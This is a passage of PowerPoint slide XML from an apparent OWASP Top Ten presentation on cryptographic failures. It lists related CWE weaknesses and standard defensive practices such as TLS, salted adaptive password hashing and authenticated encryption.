              <a:t>CWE-331 Insufficient Entropy</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-335 Incorrect Usage of Seeds in Pseudo-Random Number Generator(PRNG)</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-336 Same Seed in Pseudo-Random Number Generator (PRNG)</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-337 Predictable Seed in Pseudo-Random Number Generator (PRNG)</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-338 Use of Cryptographically Weak Pseudo-Random Number Generator(PRNG)</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-340 Generation of Predictable Numbers or Identifiers</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-347 Improper Verification of Cryptographic Signature</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-523 Unprotected Transport of Credentials</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-720 OWASP Top Ten 2007 Category A9 - Insecure Communications</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-757 Selection of Less-Secure Algorithm During Negotiation('Algorithm Downgrade')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-759 Use of a One-Way Hash without a Salt</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-760 Use of a One-Way Hash with a Predictable Salt</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-780 Use of RSA Algorithm without OAEP</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-818 Insufficient Transport Layer Protection</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-916 Use of Password Hash With Insufficient Computational Effort</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Google Shape;125;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4831925" y="1152475"/>
            <a:ext cx="3542400" cy="379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00"/>
              <a:t>Preventions</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Classify data processed, stored, or transmitted by an application. Identify which data is sensitive according to privacy laws, regulatory requirements, or business needs.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Don't store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncation. Data that is not retained cannot be stolen.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Make sure to encrypt all sensitive data at rest.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Ensure up-to-date and strong standard algorithms, protocols, and keys are in place; use proper key management.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Encrypt all data in transit with secure protocols such as TLS with forward secrecy (FS) ciphers, cipher prioritization by the server, and secure parameters. Enforce encryption using directives like HTTP Strict Transport Security (HSTS).</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Disable caching for response that contain sensitive data.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Apply required security controls as per the data classification.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Do not use legacy protocols such as FTP and SMTP for transporting sensitive data.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Store passwords using strong adaptive and salted hashing functions with a work factor (delay factor), such as Argon2, scrypt, bcrypt or PBKDF2.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Initialization vectors must be chosen appropriate for the mode of operation. For many modes, this means using a CSPRNG (cryptographically secure pseudo random number generator). For modes that require a nonce, then the initialization vector (IV) does not need a CSPRNG. In all cases, the IV should never be used twice for a fixed key.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Always use authenticated encryption instead of just encryption.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Keys should be generated cryptographically randomly and stored in memory as byte arrays. If a password is used, then it must be converted to a key via an appropriate password base key derivation function.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Ensure that cryptographic randomness is used where appropriate, and that it has not been seeded in a predictable way or with low entropy. Most modern APIs do not require the developer to seed the CSPRNG to get security.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Avoid deprecated cryptographic functions and padding schemes, such as MD5, SHA1, PKCS number 1 v1.5 .</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Verify independently the effectiveness of configuration and settings.</a:t>
            </a:r>
            <a:endParaRPr sz="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